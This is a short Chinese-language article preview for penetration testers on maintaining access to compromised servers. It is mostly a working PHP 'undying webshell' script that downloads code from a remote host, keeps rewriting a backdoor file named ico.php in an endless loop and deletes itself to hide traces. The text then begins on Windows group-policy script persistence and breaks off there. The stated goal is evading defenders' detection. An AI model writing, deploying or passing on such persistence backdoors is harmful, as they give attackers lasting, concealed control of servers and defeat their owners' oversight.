文章预览
前言 作为一个渗透测试人员的话可能我们需要对渗透成功的服务器进行权限维持,以防止服务器掉线或者被有关人员发现我们的渗透痕迹导致防守人员发现渗透测试人员的攻击事件从而导致整个项目停止等一些的问题。 Windows权限维持 PHP不死马权限维持 ignore_user_abort(); //与客户端进行长连接,关掉浏览器,PHP脚本也可以继续执行. set_time_limit( 0 ); //可以让程序无限制的执行下去 $remote_file = 'http://192.168.86.1/only.txt' ; $code = file_get_contents($remote_file); $interval = 5 ; // 每隔*秒运行 do { $filename = 'ico.php' ; if (file_exists($filename)){ echo "xxxx" ; } else { $file = fopen( "ico.php" , "w" ); $txt = $code; fwrite($file, $txt); fclose($file); } sleep($interval); unlink( __FILE__ ); // 删除文件本身 } while ( true ); ?> 组策略脚本 打开组策略(gpedit.msc)-->计算机配置-->Windows设置-->脚本(
………………………………